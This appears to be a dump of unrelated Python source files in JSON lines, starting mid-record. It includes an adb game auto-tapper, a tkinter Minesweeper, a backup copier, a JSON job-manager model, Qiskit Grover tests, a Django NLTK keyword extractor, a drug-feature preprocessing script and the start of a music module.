1080\nstep_wait = [20, 75]\nrepeat_times = 130\nlogging.basicConfig(format='%(asctime)s %(message)s',\n datefmt='%m/%d/%Y %I:%M:%S %p',\n level=logging.DEBUG)\n\n\ndef tap_screen(x, y):\n base_x, base_y = 2160, 1080\n real_x = int(x / base_x * device_x)\n real_y = int(y / base_y * device_y)\n os.system('adb shell input tap {} {}'.format(real_x, real_y))\n\n\ndef do_click():\n logging.debug('#点击闯关')\n tap_screen(1628, 916)\n sleep(random.randint(step_wait[0], step_wait[0]+5))\n\n logging.debug('#攻击')\n for i in range(random.randint(step_wait[1], step_wait[1]+10)):\n tap_screen(1853, 931)\n sleep(random.random()/2)\n\n\nif __name__ == '__main__':\n for i in range(repeat_times):\n logging.info('round #{}'.format(i + 1))\n do_click()\n","sub_path":"toolkits/get_gok_money.py","file_name":"get_gok_money.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"568554813","text":"from random import randint\nfrom tkinter import *\nfrom tkinter import ttk\n\n\ndef putMine(prob):\n if randint(1, prob) == 1:\n return 1\n else:\n return 0\n\n\ndef isvalid(r: int, c: int) -> bool:\n \"\"\"\n Returns true if the coords are within range, false otherwise\n :r: row to check\n :c: column to check\n :return: bool indicating if the coordinates are valid\n \"\"\"\n if r < 0 or r > 9 or c < 0 or c > 9:\n return False\n return True\n\n\ndef count_mines(w: ttk.Widget, r: int, c: int) -> None:\n \"\"\"\n :w: Widget where I need to display the number of mines\n :r: Row where it is located in the list\n :c: Column where it is located in the list\n :return: None\n \"\"\"\n # print(\"DEBUG r/c -> \", r, c)\n global intvars\n mines = 0\n for x in range(-1, 2, 1):\n for y in range(-1, 2, 1):\n print(x, y)\n if isvalid(c+x, r+y):\n print(\"intvar:\", intvars[c+x][r+y].get())\n if intvars[c+x][r+y].get() == 1:\n mines += 1\n w['text'] = mines\n\n\ndef init():\n \"\"\"\n Method that builds the labels and intvars needed for it. It is also called when pressing the New Game button\n \"\"\"\n # Variables for initializing the game\n DIFFICULTY = 10\n global labels\n global intvars\n global readylabel\n labels = list()\n intvars = list()\n readylabel.set(\"Ready to play!\")\n # Loop for adding the labels\n for r in range(10):\n intvars.append([])\n labels.append([])\n for c in range(10):\n intvars[r].append(IntVar())\n intvars[r][c].set(putMine(DIFFICULTY))\n labels[r].append(ttk.Label(frame, text=\" \", relief=RAISED, anchor=\"center\"))\n labels[r][c].grid(row=r, column=c, sticky=\"NSWE\")\n bind_label(labels[r][c], r, c)\n\n\ndef bind_label(w: ttk.Widget, r: int, c: int) -> None:\n \"\"\"\n Binds the label with the events needed to display the ammount of bombs next to it\n :w: Widget to bind\n :r: Row where the widget is located in the list\n :c: Column where the widget is located in the list\n :return: None\n \"\"\"\n print(\"Binded label: \", r, c)\n w.bind('', lambda e: count_mines(w, r, c))\n w.bind('', lambda e: delete_text(w))\n w.bind('', lambda e: check_mine(w, r, c))\n\n\ndef check_mine(w: ttk.Widget, r: int, c: int) -> None:\n \"\"\"\n Checks if the given mine contains a bomb or not and changes it's color based on it\n :w: Label to check\n :r: row where the intvar is located in the list\n :c: column where the intvar is located in the list\n :return: none\n \"\"\"\n global intvars\n global readylabel\n if intvars[r][c].get() == 1:\n w['background'] = 'red'\n readylabel.set(\"YOU LOOSER!!\")\n else:\n w['background'] = 'cyan'\n\n\ndef delete_text(w: ttk.Widget) -> None:\n \"\"\"\n Deletes the text of the given Widget\n :w: Widget which's text is going to be deleted\n :return: None\n \"\"\"\n w['text'] = ''\n\n\n# FRAMEWORK\nwindow = Tk()\nwindow.title('Minesweeper')\nwindow.rowconfigure(0, weight=1)\nwindow.columnconfigure(0, weight=1)\n# Creating the frame for the grid\nframe = ttk.Frame(window, padding=8, relief=RAISED)\nframe.grid(column=0, row=0, sticky=N)\n# Lists for holding the IntVars and labels\nlabels = None\nintvars = None\n# Variable for the ready to play label\nreadylabel = StringVar()\n# Call the init method to build the frame\ninit()\n# Adding the label and button on the last row\nttk.Label(frame, textvariable=readylabel, relief=RAISED, anchor=\"center\")\\\n .grid(row=10, column=0, columnspan=5, sticky=\"NSWE\")\nButton(frame, text=\"New Game\", relief=RAISED, command=init)\\\n .grid(row=10, column=5, columnspan=5, sticky=\"NSWE\")\n# Loop for setting the size and weights\ncol_count, row_count = frame.grid_size()\nfor col in range(col_count):\n frame.grid_columnconfigure(col, minsize=30, weight=0)\nfor row in range(row_count):\n frame.grid_rowconfigure(row, minsize=30, weight=0)\n# Refresh screen and launch it\nwindow.update()\nwindow.minsize(window.winfo_width(), window.winfo_height())\nwindow.mainloop()\n","sub_path":"tKinter/test05/barreiro_tieles.py","file_name":"barreiro_tieles.py","file_ext":"py","file_size_in_byte":4115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"337955759","text":"'''\nCreated by GD\n11.04.2017\nProgram for Backup Moving to RAID removable storage\nv.1 \n'''\n\nfrom datetime import datetime\nimport os\nimport shutil\n\n\ndef checkForRequirements():\n if os.name != 'nt':\n exit('Wrong operation system. This program work with Windows NT only')\n\ndef getPathOfSourceFiles():\n sourcePath = input('Enter source folder path: \\n') + '\\\\'\n distPath = input('Enter destination folder path: \\n') + '\\\\'\n logPath = input('Enter log folder path: \\n') + '\\\\'\n sourcePath = sourcePath.strip().lower()\n distPath = distPath.strip().lower()\n logPath = logPath.strip().lower()\n if logPath == '\\\\':\n logPath = distPath\n if sourcePath == '\\\\' or distPath == '\\\\':\n '''\n sourcePath = 'C:\\\\inc\\\\'\n distPath = 'D:\\\\inc\\\\'\n logPath = 'D:\\\\inc\\\\'\n return sourcePath, distPath, logPath\n '''\n exit('Empty path')\n else:\n return sourcePath, distPath, logPath\n\n\ndef checkFreeSpaceOnDisk(distPath):\n return shutil.disk_usage(distPath).free\n\n\ndef checkCommonFilesSize(sourcePath, distPath):\n commonSize = 0\n for i in os.listdir(sourcePath):\n s = sourcePath + i\n d = distPath + i\n if os.path.isfile(s):\n if not os.path.exists(d):\n commonSize += int(os.path.getsize(s))\n else:\n s += '\\\\'\n d += '\\\\'\n commonSize += checkCommonFilesSize(s, d)\n return commonSize\n\n\ndef checkEnoughSpace(freeDiskSpace, filesVolume):\n createLogFile(logPath)\n if freeDiskSpace > filesVolume:\n copyFiles(sourcePath, distPath)\n else:\n wirteErrorToLog('Not enough disk space')\n exit('Not enough disk space')\n endLog()\n\n\ndef copyFiles(sourcePath, distPath):\n for i in os.listdir(sourcePath):\n s = sourcePath + i\n if os.path.isfile(s):\n if not os.path.exists(distPath + i):\n writeToLog(s)\n shutil.copy2(sourcePath + '\\\\' + i, distPath)\n else:\n if not os.path.exists(distPath + i):\n os.mkdir(distPath + i)\n copyFiles(s + \"\\\\\", distPath + i + '\\\\')\n else:\n copyFiles(s + \"\\\\\", distPath + i + '\\\\')\n\n\ndef createLogFile(logPath):\n f = open(logPath + 'Backup Moving Log file.txt', 'a')\n f.write(\n '\\n' + '--- Start BackUp copy in ' + str(datetime.now().strftime('%d-%m-%Y %H:%M:%S')) + ' ---' + '\\n' + '\\n')\n f.close()\n\n\ndef writeToLog(copiedFile):\n f = open(logPath + 'Backup Moving Log file.txt', 'a')\n f.write(str(datetime.now().strftime('%H:%M:%S')) + ' ' + copiedFile + '\\n')\n f.close()\n\n\ndef wirteErrorToLog(errorName):\n f = open(logPath + 'Backup Moving Log file.txt', 'a')\n f.write(str(datetime.now().strftime('%H:%M:%S')) + ' ' + errorName + '\\n')\n f.close()\n\n\ndef endLog():\n f = open(logPath + 'Backup Moving Log file.txt', 'a')\n f.write(\n '\\n' + '--- End BackUp copy in ' + str(datetime.now().strftime('%d-%m-%Y %H:%M:%S')) + ' ---' + '\\n' + '\\n')\n f.close()\n\nif __name__ == \"__main__\":\n checkForRequirements()\n sourcePath, distPath, logPath = getPathOfSourceFiles()\n checkEnoughSpace(checkFreeSpaceOnDisk(distPath), checkCommonFilesSize(sourcePath, distPath))\n","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":3257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"244753067","text":"\"\"\"Implementation of model that stores the data in a json file.\n\"\"\"\nimport os.path\nimport json\nimport copy\nimport shutil\nimport threading\nimport logging\n\nimport lockfile\n\nfrom common import *\nimport fix_path\nimport dist_job_mgr.model as model\nimport dist_job_mgr.mem_model as mem_model\n\nclass JsonModelError(Exception):\n pass\n\nlogger = logging.getLogger(__name__)\n\ndef pool_to_json(pool):\n p = {\n \"name\":pool.name,\n \"node_names\":[n for n in pool.nodes_by_name.keys()],\n \"available_set\":[n for n in pool.available_set]\n }\n return p\n\ndef json_to_pool(model, incarnation, data):\n p = mem_model.StaticNodePool(model, data[\"name\"])\n p.incarnation = incarnation\n return p\n\ndef node_to_json(node):\n return {\n \"name\":node.name,\n \"os_username\": node.os_username,\n \"worker_port\": node.worker_port,\n \"is_temporary\": node.is_temporary(),\n \"hostname\": node.hostname,\n \"public_ip\":node.public_ip,\n \"private_ip\":node.private_ip,\n \"pool\":node.pool.name if node.pool else None,\n \"job_id\":node.job.job_id if node.job else None,\n \"task_id\":node.task.task_id if node.task else None\n }\n\n\ndef json_to_node(model, incarnation, data):\n n = mem_model.Node(model, data[\"name\"], data[\"os_username\"],\n data[\"worker_port\"], data[\"is_temporary\"],\n hostname=data[\"hostname\"],\n public_ip=data[\"public_ip\"],\n private_ip=data[\"private_ip\"])\n n.incarnation = incarnation\n return n\n\n\ndef task_to_json(task):\n return {\n \"task_id\":task.task_id,\n \"name\":task.name,\n \"task_type\":task.task_type,\n \"node_name\":task.node_name,\n \"description\":task.description,\n \"result_status\":task.result_status\n }\n\ndef json_to_task(model, incarnation, job, data):\n task = mem_model.Task(model, data[\"task_id\"], data[\"name\"],\n job, data[\"task_type\"], data[\"node_name\"],\n data[\"description\"])\n task.result_status = data[\"result_status\"]\n task.incarnation = incarnation\n return task\n\ndef job_to_json(job):\n return {\n \"job_id\": job.job_id,\n \"name\": job.name,\n \"job_type\":job.job_type,\n \"description\":job.description,\n \"coordinator_lockfile\":job.coordinator_lockfile,\n \"pool\":job.node_pool.name if job.node_pool else None,\n \"nodes\":[node.name for node in job.current_nodes],\n \"completion_status\":job.completion_status,\n \"completion_comment\":job.completion_comment,\n \"num_active_tasks\":job.num_active_tasks,\n \"tasks\":[task_to_json(task) for task in job.tasks]\n }\n\ndef json_to_job(model, incarnation, data):\n j = mem_model.Job(incarnation, data[\"job_id\"], data[\"name\"],\n data[\"job_type\"], data[\"description\"],\n data[\"coordinator_lockfile\"])\n j.completion_status = data[\"completion_status\"]\n j.completion_comment = data[\"completion_comment\"]\n j.num_active_tasks = data[\"num_active_tasks\"]\n j.tasks = [json_to_task(model, incarnation, j, task_data) for task_data in\n data[\"tasks\"]]\n j.task_names = set([task.name for task in j.tasks])\n return j\n\ndef jobdb_to_json(jobdb):\n jobs = {}\n for (k, job) in jobdb.jobs_by_id.items():\n jobs[k] = job_to_json(job)\n return {\n \"jobs_by_id\": jobs,\n \"next_id_for_name\": copy.deepcopy(jobdb.next_id_for_name)\n }\n\ndef json_to_jobdb(model, incarnation, data):\n job_db = mem_model.JobDb()\n job_db.next_id_for_name = data[\"next_id_for_name\"]\n for (k, j) in data[\"jobs_by_id\"].items():\n job_db.jobs_by_id[k] = json_to_job(model, incarnation, j)\n # fixup the jobs_by_name map\n for job in job_db.jobs_by_id.values():\n if job_db.jobs_by_name.has_key(job.name):\n job_db.jobs_by_name[job.name].append(job)\n else:\n job_db.jobs_by_name[job.name] = [job,]\n return job_db\n\n \ndef json_to_state(model, data):\n state = State()\n state.incarnation = data[\"incarnation\"]\n pools_data = data[\"pools\"]\n for (k, p) in pools_data.items():\n state.pools[k] = json_to_pool(model, state.incarnation, p)\n nodes_data = data[\"nodes\"]\n for node in nodes_data.values():\n state.all_nodes.add_node(json_to_node(model, state.incarnation, node))\n jobs_data = data[\"jobs\"]\n state.jobs = json_to_jobdb(model, state.incarnation,\n jobs_data)\n # fixup node references\n for node in state.all_nodes.by_name.values():\n data = nodes_data[node.name]\n pool_name = data[\"pool\"]\n if pool_name:\n node.pool = state.pools[pool_name]\n job_id = data[\"job_id\"]\n if job_id:\n node.job = state.jobs.jobs_by_id[job_id]\n # fixup pool references\n for pool in state.pools.values():\n data = pools_data[pool.name]\n pool.available_set = set(data[\"available_set\"])\n for node_name in data[\"node_names\"]:\n pool.nodes_by_name[node_name] = state.all_nodes.by_name[node_name]\n # fixup job references\n for job in state.jobs.jobs_by_id.values():\n data = jobs_data[\"jobs_by_id\"][job.job_id]\n if data[\"pool\"]:\n job.node_pool = state.pools[data[\"pool\"]]\n for node_name in data[\"nodes\"]:\n job.current_nodes.append(state.all_nodes.by_name[node_name])\n for task in job.tasks:\n if task.node_name and task.result_status==None:\n node = state.all_nodes.by_name[task.node_name]\n node.task = task\n return state\n\n\nclass State(mem_model.State):\n def __init__(self):\n mem_model.State.__init__(self)\n\n def to_json(self):\n data = {}\n assert isinstance(self.incarnation, int), \"Incarnation value %s is not an int\" % self.incarnation\n data[\"incarnation\"] = self.incarnation\n pools = {}\n for (k, p) in self.pools.items():\n pools[k] = pool_to_json(p)\n data[\"pools\"] = pools\n nodes = {}\n for (k, n) in self.all_nodes.by_name.items():\n nodes[k] = node_to_json(n)\n data[\"nodes\"] = nodes\n data[\"jobs\"] = jobdb_to_json(self.jobs)\n return data\n\nclass SharedLock(object):\n def __init__(self):\n self.lock = threading.Lock()\n\n def acquire(self):\n self.lock.acquire()\n\n def release(self):\n self.lock.release()\n\n def __deepcopy__(self, memo):\n c = SharedLock()\n c.lock = self.lock\n return c\n \n@apply_interface_contracts(model.ModelAdapterBase)\nclass ModelAdapter(mem_model.ModelAdapter):\n def __init__(self, config_path):\n self.state = State()\n self.prev_state = None\n self.db_file_path = os.path.join(config_path, \"djm_data.json\")\n self._is_in_transaction = False\n self.incarnation_hwm = 0\n self.file_lock = lockfile.FileLock(self.db_file_path)\n self.lock = SharedLock()\n\n def create_database(self):\n if os.path.exists(self.db_file_path):\n raise JsonModelError(\"Cannot create database - database file %s already exists\" %\n self.db_file_path)\n with open(self.db_file_path, \"wb\") as f:\n json.dump(self.state.to_json(), f)\n\n def begin_transaction(self):\n self.lock.acquire()\n assert not self.is_in_transaction()\n self.file_lock.acquire(timeout=500)\n with open(self.db_file_path, \"rb\") as f:\n data = json.load(f)\n self.state = json_to_state(self, data)\n self.state.inc_incarnation(self)\n self._is_in_transaction = True\n\n def commit_transaction(self):\n assert self.is_in_transaction()\n self.state.unlock_all()\n shutil.copy(self.db_file_path, self.db_file_path + \".prev\")\n with open(self.db_file_path, \"wb\") as f:\n json.dump(self.state.to_json(), f, indent=2)\n self.file_lock.release()\n self._is_in_transaction = False\n logger.debug(\"Committed transaction %d\" % self.state.incarnation)\n self.lock.release()\n\n def abort_transaction(self):\n assert self.is_in_transaction()\n self.state = None\n self.file_lock.release()\n self._is_in_transaction = False\n self.lock.release()\n\n def is_in_transaction(self):\n return self._is_in_transaction\n\n def _get_incarnation(self):\n return self.state.incarnation if self.state else -1\n","sub_path":"dist_job_mgr/json_model.py","file_name":"json_model.py","file_ext":"py","file_size_in_byte":8511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"261986285","text":"# This code is part of Qiskit.\n#\n# (C) Copyright IBM 2018, 2020.\n#\n# This code is licensed under the Apache License, Version 2.0. You may\n# obtain a copy of this license in the LICENSE.txt file in the root directory\n# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.\n#\n# Any modifications or derivative works of this code must retain this\n# copyright notice, and modified files need to carry a notice indicating\n# that they have been altered from the originals.\n\n\"\"\" test Grover \"\"\"\n\nimport unittest\n\nfrom test.python.algorithms import QiskitAlgorithmsTestCase\nfrom qiskit import BasicAer, QuantumCircuit\nfrom qiskit.utils import QuantumInstance\nfrom qiskit.algorithms import Grover\nfrom qiskit.circuit.library import GroverOperator\nfrom qiskit.quantum_info import Operator, Statevector\n\n\nclass TestGroverConstructor(QiskitAlgorithmsTestCase):\n \"\"\"Test for the constructor of Grover\"\"\"\n\n def setUp(self):\n super().setUp()\n oracle = QuantumCircuit(2)\n oracle.cz(0, 1)\n self._expected_grover_op = GroverOperator(oracle=oracle)\n\n def test_oracle_quantumcircuit(self):\n \"\"\"Test QuantumCircuit oracle\"\"\"\n oracle = QuantumCircuit(2)\n oracle.cz(0, 1)\n grover = Grover(oracle=oracle, good_state=[\"11\"])\n grover_op = grover._grover_operator\n self.assertTrue(Operator(grover_op).equiv(Operator(self._expected_grover_op)))\n\n def test_oracle_statevector(self):\n \"\"\"Test StateVector oracle\"\"\"\n mark_state = Statevector.from_label('11')\n grover = Grover(oracle=mark_state, good_state=['11'])\n grover_op = grover._grover_operator\n self.assertTrue(Operator(grover_op).equiv(Operator(self._expected_grover_op)))\n\n def test_state_preparation_quantumcircuit(self):\n \"\"\"Test QuantumCircuit state_preparation\"\"\"\n state_preparation = QuantumCircuit(2)\n state_preparation.h(0)\n oracle = QuantumCircuit(3)\n oracle.cz(0, 1)\n grover = Grover(oracle=oracle, state_preparation=state_preparation,\n good_state=[\"011\"])\n grover_op = grover._grover_operator\n expected_grover_op = GroverOperator(oracle, state_preparation=state_preparation)\n self.assertTrue(Operator(grover_op).equiv(Operator(expected_grover_op)))\n\n def test_is_good_state_list(self):\n \"\"\"Test List is_good_state\"\"\"\n oracle = QuantumCircuit(2)\n oracle.cz(0, 1)\n is_good_state = [\"11\", \"00\"]\n grover = Grover(oracle=oracle, good_state=is_good_state)\n self.assertListEqual(grover._is_good_state, [\"11\", \"00\"])\n\n def test_is_good_state_statevector(self):\n \"\"\"Test StateVector is_good_state\"\"\"\n oracle = QuantumCircuit(2)\n oracle.cz(0, 1)\n is_good_state = Statevector.from_label('11')\n grover = Grover(oracle=oracle, good_state=is_good_state)\n self.assertTrue(grover._is_good_state.equiv(Statevector.from_label('11')))\n\n def test_grover_operator(self):\n \"\"\"Test GroverOperator\"\"\"\n oracle = QuantumCircuit(2)\n oracle.cz(0, 1)\n grover_op = GroverOperator(oracle)\n grover = Grover(oracle=grover_op.oracle,\n grover_operator=grover_op, good_state=[\"11\"])\n grover_op = grover._grover_operator\n self.assertTrue(Operator(grover_op).equiv(Operator(self._expected_grover_op)))\n\n\nclass TestGroverPublicMethods(QiskitAlgorithmsTestCase):\n \"\"\"Test for the public methods of Grover\"\"\"\n\n def test_is_good_state(self):\n \"\"\"Test is_good_state\"\"\"\n oracle = QuantumCircuit(2)\n oracle.cz(0, 1)\n list_str_good_state = [\"11\"]\n grover = Grover(oracle=oracle, good_state=list_str_good_state)\n self.assertTrue(grover.is_good_state(\"11\"))\n\n statevector_good_state = Statevector.from_label('11')\n grover = Grover(oracle=oracle, good_state=statevector_good_state)\n self.assertTrue(grover.is_good_state(\"11\"))\n\n list_int_good_state = [0, 1]\n grover = Grover(oracle=oracle, good_state=list_int_good_state)\n self.assertTrue(grover.is_good_state(\"11\"))\n\n def _callable_good_state(bitstr):\n if bitstr == \"11\":\n return True, bitstr\n else:\n return False, bitstr\n grover = Grover(oracle=oracle, good_state=_callable_good_state)\n self.assertTrue(grover.is_good_state(\"11\"))\n\n def test_construct_circuit(self):\n \"\"\"Test construct_circuit\"\"\"\n oracle = QuantumCircuit(2)\n oracle.cz(0, 1)\n grover = Grover(oracle=oracle, good_state=[\"11\"])\n constructed = grover.construct_circuit(1)\n grover_op = GroverOperator(oracle)\n expected = QuantumCircuit(2)\n expected.compose(grover_op.state_preparation, inplace=True)\n expected.compose(grover_op, inplace=True)\n self.assertTrue(Operator(constructed).equiv(Operator(expected)))\n\n def test_grover_operator_getter(self):\n \"\"\"Test the getter of grover_operator\"\"\"\n oracle = QuantumCircuit(2)\n oracle.cz(0, 1)\n grover = Grover(oracle=oracle, good_state=[\"11\"])\n constructed = grover.grover_operator\n expected = GroverOperator(oracle)\n self.assertTrue(Operator(constructed).equiv(Operator(expected)))\n\n\nclass TestGroverFunctionality(QiskitAlgorithmsTestCase):\n \"\"\"Test for the functionality of Grover\"\"\"\n\n def setUp(self):\n super().setUp()\n self._oracle = Statevector.from_label('111')\n self._expected_grover_op = GroverOperator(oracle=self._oracle)\n self._expected = QuantumCircuit(self._expected_grover_op.num_qubits)\n self._expected.compose(self._expected_grover_op.state_preparation, inplace=True)\n self._expected.compose(self._expected_grover_op.power(2), inplace=True)\n backend = BasicAer.get_backend('statevector_simulator')\n self._sv = QuantumInstance(backend)\n\n def test_iterations(self):\n \"\"\"Test the iterations argument\"\"\"\n grover = Grover(oracle=self._oracle, good_state=['111'], iterations=2)\n ret = grover.run(self._sv)\n self.assertTrue(Operator(ret['circuit']).equiv(Operator(self._expected)))\n\n grover = Grover(oracle=self._oracle, good_state=['111'], iterations=[1, 2, 3])\n ret = grover.run(self._sv)\n self.assertTrue(ret.oracle_evaluation)\n self.assertIn(ret.top_measurement, ['111'])\n\n\nclass TestGroverExecution(QiskitAlgorithmsTestCase):\n \"\"\"Test for the execution of Grover\"\"\"\n\n def setUp(self):\n super().setUp()\n backend = BasicAer.get_backend('qasm_simulator')\n self._qasm = QuantumInstance(backend)\n\n def test_run_circuit_oracle(self):\n \"\"\"Test execution with a quantum circuit oracle\"\"\"\n oracle = QuantumCircuit(2)\n oracle.cz(0, 1)\n list_good_state = [\"11\"]\n grover = Grover(oracle=oracle, good_state=list_good_state)\n ret = grover.run(self._qasm)\n self.assertIn(ret['top_measurement'], list_good_state)\n\n def test_run_state_vector_oracle(self):\n \"\"\"Test execution with a state vector oracle\"\"\"\n mark_state = Statevector.from_label('11')\n grover = Grover(oracle=mark_state, good_state=['11'])\n ret = grover.run(self._qasm)\n self.assertIn(ret['top_measurement'], ['11'])\n\n def test_run_grover_operator_oracle(self):\n \"\"\"Test execution with a grover operator oracle\"\"\"\n oracle = QuantumCircuit(2)\n oracle.cz(0, 1)\n grover_op = GroverOperator(oracle)\n grover = Grover(oracle=grover_op.oracle,\n grover_operator=grover_op, good_state=[\"11\"])\n ret = grover.run(self._qasm)\n self.assertIn(ret['top_measurement'], ['11'])\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test/python/algorithms/test_grover.py","file_name":"test_grover.py","file_ext":"py","file_size_in_byte":7806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"281279311","text":"from django.shortcuts import render, redirect\nimport sys \nfrom nltk.tag import tnt\nfrom nltk.corpus import indian\nimport nltk\nfrom nltk.tree import Tree\nfrom langdetect import detect\n\n# Create your views here.\ndef index(request):\n return render(request, 'home.html')\n\ndef output(request):\n text = request.POST.get('text')\n \n ######################### functions for information extraction in hindi ##########\n def hindi_model():\n train_data = indian.tagged_sents('hindi.pos')\n tnt_pos_tagger = tnt.TnT()\n tnt_pos_tagger.train(train_data)\n return tnt_pos_tagger\n\n\n def get_keywords(pos):\n grammar = r\"\"\"NP:{}\"\"\"\n chunkParser = nltk.RegexpParser(grammar)\n chunked = chunkParser.parse(pos)\n continuous_chunk = set()\n current_chunk = []\n for i in chunked:\n if type(i) == Tree:\n current_chunk.append(\" \".join([token for token, pos in i.leaves()]))\n elif current_chunk:\n named_entity = \" \".join(current_chunk)\n if named_entity not in continuous_chunk:\n continuous_chunk.add(named_entity)\n current_chunk = []\n else:\n continue\n return (continuous_chunk)\n\n ######################## end for hindi #################\n\n ########### Funcitons for English #################\n\n def extract_eng(text):\n output = [word for (word, pos) in nltk.pos_tag(nltk.word_tokenize(text)) if pos[0] == 'N']\n return output\n \n # sample input for hindi language\n # text = \"इराक के विदेश मंत्री ने अमरीका के उस प्रस्ताव का मजाक उड़ाया है , जिसमें अमरीका ने संयुक्त राष्ट्र के प्रतिबंधों को इराकी नागरिकों के लिए कम हानिकारक बनाने के लिए कहा है ।\"\n ########### end for english ################\n d_flag = detect(text)\n if d_flag == 'en':\n result = extract_eng(text)\n return render(request, 'home.html', {'text': result})\n elif d_flag == 'hi':\n model = hindi_model()\n new_tagged = model.tag(nltk.word_tokenize(text))\n result = list(get_keywords(new_tagged))\n return render(request, 'home.html', {'text': result})\n \n result = \"Can not detect your Language, please try to extract Hindi or English.\"\n return render(request, 'home.html', {'text': result})","sub_path":"Complete Project With UI/Extract_Information/extract/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"654486719","text":"import os\nimport errno\nfrom pubchempy import *\nimport pandas as pd\nimport math\nimport csv\n\nfrom feature_clean import clean, clean_padel, remove_all_same\nfrom feature_encode import encode, join\n\norigin_path = '../../'\n\ndef create_folders():\n try:\n os.makedirs(origin_path + './data/results')\n os.makedirs(origin_path + './results')\n except OSError as exception:\n if exception.errno != errno.EEXIST:\n raise\n\n\ndef generate_smiles(_origin_path, _drug_list_df):\n cids = _drug_list_df.pubchem_id\n names = _drug_list_df.name\n\n isomeric_file = open(_origin_path + 'data/SMiLES/isomeric.smi', 'w')\n canonical_file = open(_origin_path + 'data/SMiLEScanonical.smi', 'w')\n\n for cid, name in zip(cids, names):\n if not(math.isnan(cid)):\n c = Compound.from_cid(int(cid))\n print(c.isomeric_smiles + ' ' + name)\n isomeric_file.write(c.isomeric_smiles + ' ' + name + '\\n')\n canonical_file.write(c.canonical_smiles + ' ' + name + '\\n')\n\n isomeric_file.close()\n canonical_file.close()\n\n\nif __name__ == \"__main__\":\n drug_list_df = pd.read_csv(origin_path + 'data/journal.pone.0061318.s004.CSV', ';')\n gdsc_df = pd.read_csv(origin_path + 'data/GSDC/1.1/gdsc_manova_input_w1_1.csv', ';')\n gdsc11_df = pd.read_csv(origin_path + 'data/GSDC/2/gdsc_manova_input_w2.csv', ';')\n gdsc11_df = gdsc11_df.set_index(gdsc11_df.ix[:, 0])\n orig_df = gdsc_df\n gdsc_df = gdsc_df[gdsc_df.columns[:gdsc_df.columns.get_loc(\"Erlotinib_ALPHA\")]]\n\n gSpanFP_df = pd.read_csv(origin_path + 'data/gSpan/gSpanRows.csv', ';')\n gSpanFP_df.drop(gSpanFP_df.columns[0], axis=1, inplace=True)\n gSpanFP_df.to_csv(origin_path + 'data/results/drug_feature_set_TEST_GSPAN.csv', sep=\";\", index=False)\n #print(gSpanFP_df)\n #print(gdsc_df.columns.get_loc(\"Erlotinib_ALPHA\"))\n\n create_folders()\n generate_smiles(origin_path, drug_list_df)\n\n gdsc_df = clean(origin_path, gdsc_df)\n\n gdsc_df.to_csv(origin_path + 'data/results/teste.csv', sep=\";\", index=False)\n assert (len(gdsc_df.index) == 579)\n #assert (len(gdsc_df.index) == 618)\n #print(gdsc_df)\n gdsc_df.to_csv(origin_path + 'data/results/result.csv', sep=\";\", index=False)\n\n padel_1d_df = pd.read_csv(origin_path + 'data/padel-results.csv', ';')\n padel_fingerprint_df = pd.read_csv(origin_path + 'data//padel-results-fingerprints.csv', ';')\n drug_result_df = clean_padel(origin_path, padel_1d_df, padel_fingerprint_df)\n drug_result_df.to_csv(origin_path + 'data/results/drug_feature_set.csv', sep=\";\", index=False)\n\n gSpanFP_df = gSpanFP_df.drop(gSpanFP_df.columns[1], axis=1)\n drug_result_df = pd.concat([drug_result_df, gSpanFP_df], axis=1)\n #drug_result_df_test.to_csv(origin_path + 'data/results/drug_feature_set_TEST_GSPAN.csv', sep=\";\", index=False)\n\n copy_df = gdsc_df.copy()\n\n cell_encoded_df = encode(origin_path, gdsc_df)\n cell_encoded_df.to_csv(origin_path + 'data/results/cell_feature_set.csv', sep=\";\", index=False)\n\n final_rows, final_rows_test = join(cell_encoded_df, drug_result_df, copy_df, gdsc11_df)\n #print(final_rows['WT1_wt'])\n columns_same = remove_all_same(final_rows)\n\n final_rows_test.drop(columns_same, axis=1, inplace=True)\n\n #remove_all_same(final_rows_test)\n\n\n\n final_no_ic50 = final_rows[final_rows.isnull().any(axis=1)]\n final_no_ic50 = final_rows.loc[final_rows['ic50'] == None]\n final_rows = final_rows[final_rows.notnull().all(axis=1)]\n #final_no_ic50.to_csv(origin_path + 'data/results/final_no_ic50.csv', sep=\";\", index=False)\n #print(final_rows['WT1_wt'])\n #final_rows.to_csv(origin_path + 'data/results/final.csv', sep=\";\", index=False)\n final_rows_test.to_csv(origin_path + 'data/results/final_test_gSpan.csv', sep=\";\", index=False)\n\n #final_no_ic50_gSpan = final_rows_gspan[final_rows_gspan.isnull().any(axis=1)]\n #final_no_ic50_gSpan = final_rows_gspan.loc[final_rows_gspan['ic50'] == None]\n #final_rows_gspan = final_rows_gspan[final_rows_gspan.notnull().all(axis=1)]\n final_no_ic50.to_csv(origin_path + 'data/results/final_no_ic50_gSpan.csv', sep=\";\", index=False)\n #print(final_rows['WT1_wt'])\n final_rows.to_csv(origin_path + 'data/results/final_gSpan.csv', sep=\";\", index=False)","sub_path":"src/data_cleaning/data_preprocess.py","file_name":"data_preprocess.py","file_ext":"py","file_size_in_byte":4267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"387667775","text":"\"\"\"This file contains the functions for service4 Implementation 1 & 2.\"\"\"\n\n# Imports --------------------------------------------------------------\n\nfrom mingus.containers import Bar\nfrom mingus.midi import midi_file_out\nfrom mingus.extra.lilypond import to_png, from_Bar\n\n# Functions ------------------------------------------------------------\n\n\ndef generate_key_offset(input_key, key_offset_dictionary):\n \"\"\" A function which takes a given user's key, and offsets it to the key\n of C chromatic.\n\n We add our key_offset to the current pitch value.\n We return a transposed index position (from the key of C chromatic).\n\n Keyword Arguments:\n input_key: The key of our musical phrase, set by the user in\n service #1.\n\n 